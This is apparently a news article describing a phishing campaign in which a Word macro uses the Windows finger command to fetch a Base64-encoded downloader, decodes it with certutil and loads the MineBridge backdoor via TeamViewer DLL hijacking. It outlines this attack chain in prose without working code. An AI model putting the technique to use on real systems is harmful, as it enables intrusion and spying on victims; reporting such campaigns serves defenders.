Hackers Use Windows Finger Command to Download Malware

Cybercriminals use the usual harmless Windows Finger command to download and install a malicious backdoor on victims' devices.

Finger command is a utility created in Linux / Unix operating systems that allows you to locally obtain a list of users on a remote computer or information about a specific remote user. In addition to Linux, Windows has a finger.exe command that performs the same function. To execute the Finger command, the user must enter finger [user] @ [remote_host].

Security researcher Kirk Sayre discovered a phishing campaign that used the Finger command to download the MineBridge backdoor. During the campaign, attackers send phishing emails with malicious Word documents disguised as a job seeker's resume. When the user clicks the "Allow Editing" or "Allow Content" buttons, a password-protected macro is launched to download the MineBridge malware.

The macro uses the Finger command to download a Base64 encoded certificate from a remote server. The certificate is a base64-encoded malware downloader executable file. It is decoded using the certutil.exe command, saved as% AppData% \ vUCooUr.exe, and then executed.

Once launched, the malware downloads the TeamViewer executable file and uses a DLL interception to load the malicious MineBridge library. After downloading MineBridge, remote attackers gain full access to the computer and can eavesdrop on the victim through the microphone of the infected device, as well as perform other malicious actions.

Previous Post Next Post